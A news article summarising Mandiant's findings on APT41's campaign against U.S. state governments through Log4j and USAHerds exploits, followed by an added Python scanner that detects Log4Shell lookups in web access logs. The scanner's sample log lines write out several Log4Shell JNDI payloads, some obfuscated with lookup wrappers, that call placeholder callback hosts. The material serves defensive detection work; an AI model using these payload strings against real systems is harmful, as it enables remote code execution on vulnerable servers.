The APT41 group compromised at least six U.S. state government networks between May 2021 and February 2022 in a “deliberate campaign” that reflects new attack vectors and retooling by the prolific Chinese state-sponsored group.

Researchers with Mandiant found that the group had compromised networks by exploiting vulnerable Internet-facing web applications, including the infamous Log4j flaw (CVE-2021-44228). In three incidents, the group also exploited a vulnerability (CVE-2021-44207) in a commercial application called USAHerds, an animal health emergency reporting system that is used by 18 states for responding to livestock-related incidents. Researchers said that the overall goals of APT41’s campaign remain unknown, although they did observe evidence of the group exfiltrating personally identifiable information (PII).

APT41’s activity against U.S. state governments “consists of significant new capabilities, from new attack vectors to post-compromise tools and techniques,” said Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman and John Wolfram, researchers with Mandiant, in a Tuesday analysis. “APT41 can quickly adapt their initial access techniques by re-compromising an environment through a different vector, or by rapidly operationalizing a fresh vulnerability.”

While APT41 has previously performed mass scanning and exploitation of flaws, these campaigns were more targeted and persistent, with the group quickly adapting to publicly disclosed vulnerabilities to gain initial access into target networks, said researchers. Within hours of the Apache Foundation’s security advisory for the Log4j flaw on Dec. 10, for instance, APT41 began to exploit the flaw in order to compromise at least two state governments, as well as its more traditional targets in the insurance and telecommunications industries.

In several cases, the group also re-compromised state government victims even after their initial attack was contained. For instance, after APT41 exploited a SQL injection flaw to compromise a state government network, Mandiant detected and contained the activity; two weeks later, however, the group re-compromised the network by exploiting the (at the time, previously unknown) flaw in the USAHerds application.

Researchers also observed new malware variants and techniques used by the group. During the early stages of one state government intrusion, for instance, APT41 leveraged a new malware family that researchers called DustPan, an in-memory dropper that was used to drop a Cobalt Strike Beacon backdoor. And after exploiting the Log4j flaw, APT41 deployed a new variant of the KeyPlug backdoor on Linux servers of multiple victims. KeyPlug is a modular backdoor that supports multiple network protocols for command and control (C2), including HTTP, TCP, KCP over UDP and WSS.

“APT41 heavily used the Windows version of the KEYPLUG backdoor at state government victims between June 2021 and December 2021, thus the deployment of a ported version of the backdoor closely following the state government campaign was significant,” said researchers.

Researchers also observed APT41 substantially increasing its usage of Cloudflare services for C2 communications and data exfiltration, including the use of Cloudflare Workers to deploy serverless code and proxy C2 traffic to APT41-operated infrastructure. Researchers said that they notified Cloudflare of the malicious activity, and the company has since disrupted communications to the malicious infrastructure.

APT41 also leveraged several post-exploitation tools that were previously part of its arsenal, including an obfuscated binary called BadPotato for local privilege escalation and credential harvesting, as well as the existing DeadEye malware and LowKey backdoor with added anti-analysis capabilities.

APT41 has been responsible for a high volume of attacks worldwide in the more than 10 years that it has been active, with previous campaigns centered around espionage as well as financial motivations. While five alleged members of the group were charged by the Department of Justice in 2020, Mandiant researchers said that this recent activity reveals that the group has been undeterred by the indictment.

“A preference for utilizing web exploits to target public-facing web applications, along with the ability to quickly shift targets based on available capabilities indicates that APT41 continues to pose a significant threat to public and private organizations alike around the world,” said Geoff Ackerman, principal threat analyst with Mandiant.
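The Log4j activity described in the article (exploitation of public-facing web applications within hours of the advisory) is what a defender most needs to be able to find in their own web logs. The following is an added example, not code from the article or from Mandiant: a small Python scanner that undoes URL encoding and the nested-lookup evasions Log4j itself resolves before matching `${jndi:` in the request line, Referer and User-Agent fields of combined-format access logs. The log lines are constructed for the example, and the IP addresses are RFC 5737 documentation ranges, not infrastructure mentioned on the page.

```python
"""Detect Log4Shell (CVE-2021-44228) JNDI lookup attempts in web access logs.

Added example for this article, not Mandiant's or the article's own code.
The log lines below are constructed, and every IP is from the RFC 5737
documentation ranges; nothing here is infrastructure from the report.
"""
import re
from urllib.parse import unquote

# Log4j resolves ${lower:x}, ${upper:x} and the ${...:-x} default-value form
# to x before the outer lookup runs, so "${${lower:j}ndi:...}" still fires.
# These two alternatives collapse such wrappers to their payload character(s).
WRAPPER_RE = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}"   # ${lower:j} -> j
    r"|\$\{[^${}]*?:-([^${}]*)\}",       # ${::-j}, ${env:NOPE:-j} -> j
    re.IGNORECASE,
)
# Scheme (ldap, rmi, dns, ...) and callback host[:port] of the lookup.
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+):/*([^/}\s]+)", re.IGNORECASE)
# Apache/nginx "combined" format: IP, ident, user, [timestamp], "request", status, bytes, "referer", "user-agent".
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" \S+ \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample log: plain lookup, ${lower:} wrapper, ${::-} wrapper,
# URL-encoded dns probe, and one benign request.
LOG_LINES = [
    '203.0.113.7 - - [10/Dec/2021:22:14:03 +0000] "GET /?x=${jndi:ldap://203.0.113.9:1389/a} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Dec/2021:23:02:44 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${${lower:j}ndi:ldap://198.51.100.20:1389/x}"',
    '192.0.2.18 - - [11/Dec/2021:01:17:09 +0000] "GET /api HTTP/1.1" 200 300 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://192.0.2.99:1099/obj}"',
    '192.0.2.55 - - [11/Dec/2021:02:00:00 +0000] "GET /search?q=%24%7Bjndi%3Adns%3A%2F%2F192.0.2.77%2Fprobe%7D HTTP/1.1" 404 100 "-" "curl/7.79"',
    '10.0.0.5 - - [11/Dec/2021:03:00:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def normalize(text: str) -> str:
    """Undo the encodings and lookup wrappers an attacker uses to hide '${jndi:'."""
    # Repeated URL-decoding catches double-encoded payloads; stop once stable.
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    # Collapse nested wrappers from the inside out until nothing changes,
    # mirroring the order in which Log4j would evaluate them.
    prev = None
    while prev != text:
        prev = text
        text = WRAPPER_RE.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text
        )
    return text


def find_jndi(text: str):
    """Return (scheme, callback_host) for the first JNDI lookup in text, else None."""
    m = JNDI_RE.search(normalize(text))
    return (m.group(1).lower(), m.group(2)) if m else None


def scan_access_log(lines):
    """Return one finding per log line whose request, Referer or User-Agent carries a lookup."""
    findings = []
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue  # not combined format; a real tool would log and move on
        for field in ("req", "ref", "ua"):
            hit = find_jndi(m.group(field))
            if hit:
                findings.append({"src": m.group("ip"), "ts": m.group("ts"),
                                 "field": field, "scheme": hit[0], "callback": hit[1]})
                break
    return findings


if __name__ == "__main__":
    for f in scan_access_log(LOG_LINES):
        print(f"{f['ts']} {f['src']} -> {f['scheme']}://{f['callback']} (in {f['field']})")
```

Normalising before matching is the point of the example: a plain grep for `${jndi:` misses the second and third lines even though Log4j evaluates them to exactly that string. The callback host is worth extracting because it is the first indicator you can block or pivot on, and a `dns://` scheme with no payload path usually means a vulnerability probe rather than a delivery attempt. The caveat is that standard access logs only record the request line, Referer and User-Agent; a lookup placed in any other header never reaches this scanner, so it complements rather than replaces patching and application-side telemetry.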